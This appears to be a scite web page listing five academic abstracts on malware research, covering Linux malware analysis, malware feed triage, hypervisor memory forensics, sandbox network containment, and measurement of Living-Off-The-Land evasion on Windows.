For the past two decades, the security community has been fighting malicious programs for Windows-based operating systems. However, the recent surge in adoption of embedded devices and the IoT revolution are rapidly changing the malware landscape. Embedded devices are profoundly different than traditional personal computers. In fact, while personal computers run predominantly on x86-flavored architectures, embedded systems rely on a variety of different architectures. In turn, this aspect causes a large number of these systems to run some variants of the Linux operating system, pushing malicious actors to give birth to "Linux malware."To the best of our knowledge, there is currently no comprehensive study attempting to characterize, analyze, and understand Linux malware. The majority of resources on the topic are available as sparse reports often published as blog posts, while the few systematic studies focused on the analysis of specific families of malware (e.g., the Mirai botnet) mainly by looking at their network-level behavior, thus leaving the main challenges of analyzing Linux malware unaddressed.This work constitutes the first step towards filling this gap. After a systematic exploration of the challenges involved in the process, we present the design and implementation details of the first malware analysis pipeline specifically tailored for Linux malware. We then present the results of the first largescale measurement study conducted on 10,548 malware samples (collected over a time frame of one year) documenting detailed statistics and insights that can help directing future work in the area.
The number of unique malware samples is growing out of control. Over the years, security companies have designed and deployed complex infrastructures to collect and analyze this overwhelming number of samples. As a result, a security company can collect more than 1M unique files per day only from its different feeds. These are automatically stored and processed to extract actionable information derived from static and dynamic analysis. However, only a tiny amount of this data is interesting for security researchers and attracts the interest of a human expert. To the best of our knowledge, nobody has systematically dissected these datasets to precisely understand what they really contain. The security community generally discards the problem because of the alleged prevalence of uninteresting samples. In this article, we guide the reader through a step-by-step analysis of the hundreds of thousands Windows executables collected in one day from these feeds. Our goal is to show how a company can employ existing state-of-the-art techniques to automatically process these samples and then perform manual experiments to understand and document what is the real content of this gigantic dataset. We present the filtering steps, and we discuss in detail how samples can be grouped together according to their behavior to support manual verification. Finally, we use the results of this measurement experiment to provide a rough estimate of both the human and computer resources that are required to get to the bottom of the catch of the day .
Abstract. Memory forensics is the branch of computer forensics that aims at extracting artifacts from memory snapshots taken from a running system. Even though it is a relatively recent field, it is rapidly growing and it is attracting considerable attention from both industrial and academic researchers. In this paper, we present a set of techniques to extend the field of memory forensics toward the analysis of hypervisors and virtual machines. With the increasing adoption of virtualization techniques (both as part of the cloud and in normal desktop environments), we believe that memory forensics will soon play a very important role in many investigations that involve virtual environments. Our approach, implemented in an open source tool as an extension of the Volatility framework, is designed to detect both the existence and the characteristics of any hypervisor that uses the Intel VT-x technology. It also supports the analysis of nested virtualization and it is able to infer the hierarchy of multiple hypervisors and virtual machines. Finally, by exploiting the techniques presented in this paper, our tool can reconstruct the address space of a virtual machine in order to transparently support any existing Volatility plugin -allowing analysts to reuse their code for the analysis of virtual environments.
This paper focuses on the containment and control of the network interaction generated by malware samples in dynamic analysis environments. A currently unsolved problem consists in the existing dependency between the execution of a malware sample and a number of external hosts (e.g. C&C servers). This dependency affects the repeatability of the analysis, since the state of these external hosts influences the malware execution but it is outside the control of the sandbox. This problem is also important from a containment point of view, because the network traffic generated by a malware sample is potentially of malicious nature and, therefore, it should not be allowed to reach external targets.The approach proposed in this paper addresses the repeatability and the containment of malware execution by exploring the use of protocol learning techniques for the emulation of the external network environment required by malware samples. We show that protocol learning techniques, if properly used and configured, can be successfully used to handle the network interaction required by malware. We present our solution, Mozzie, and show its ability to autonomously learn the network interaction associated to recent malware samples without requiring a-priori knowledge of the protocol characteristics. Therefore, our system can be used for the contained and repeatable analysis of unknown samples that rely on custom protocols for their communication with external hosts.
As malware detection algorithms and methods become more sophisticated, malware authors adopt equally sophisticated evasion mechanisms to defeat them. Anecdotal evidence claims Living-Off-The-Land (LotL) techniques are one of the major evasion techniques used in many malware attacks. These techniques leverage binaries already present in the system to conduct malicious actions. We present the first large-scale systematic investigation of the use of these techniques by malware on Windows systems.In this paper, we analyse how common the use of these native system binaries is across several malware datasets, containing a total of 31,805,549 samples. We identify an average 9.41% prevalence. Our results show that the use of LotL techniques is prolific, particularly in Advanced Persistent Threat (APT) malware samples where the prevalence is 26.26%, over twice that of commodity malware.To illustrate the evasive potential of LotL techniques, we test the usage of LotL techniques against several fully patched Windows systems in a local sandboxed environment and show that there is a generalised detection gap in 10 of the most popular anti-virus products.
scite is a Brooklyn-based organization that helps researchers better discover and understand research articles through Smart Citations–citations that display the context of the citation and describe whether the article provides supporting or contrasting evidence. scite is used by students and researchers from around the world and is funded in part by the National Science Foundation and the National Institute on Drug Abuse of the National Institutes of Health.
customersupport@researchsolutions.com
10624 S. Eastern Ave., Ste. A-614
Henderson, NV 89052, USA
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.
Copyright © 2024 scite LLC. All rights reserved.
Made with 💙 for researchers
Part of the Research Solutions Family.